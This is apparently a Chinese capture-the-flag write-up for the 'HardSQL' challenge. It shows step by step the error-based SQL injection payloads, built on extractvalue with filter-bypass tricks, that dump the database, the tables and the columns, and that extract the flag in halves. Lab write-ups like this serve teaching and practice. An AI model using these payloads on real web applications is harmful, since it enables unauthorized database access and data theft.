[极客大挑战 2019]HardSQL1

avatar
作者
猴君
阅读量:0

拿到题目,好多类似的,这次估计更难,sql注入漏洞

随便注入一个

估计是被过滤了

2.1我们先去爆数据库:先构造payload:

?username=admin&password=admin'^extractvalue(1,concat(0x5c,(select(database()))))%23

爆表名

?username=admin&password=admin'^extractvalue(1,concat(0x5c,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like('geek'))))%23

爆列名

?username=admin&password=admin'^extractvalue(1,concat(0x5c,(select(group_concat(column_name))from(information_schema.columns)where(table_name)like('H4rDsq1'))))%23

flag出来了,但是只有一半,使用right和left

/check.php?username=admin&password=admin%27^extractvalue(1,concat(0x7e,(select(left(password,30))from(geek.H4rDsq1))))%23  /check.php?username=admin&password=admin%27^extractvalue(1,concat(0x7e,(select(right(password,30))from(geek.H4rDsq1))))%23

得到flag

广告一刻

为您即时展示最新活动产品广告消息,让您随时掌握产品活动新动态!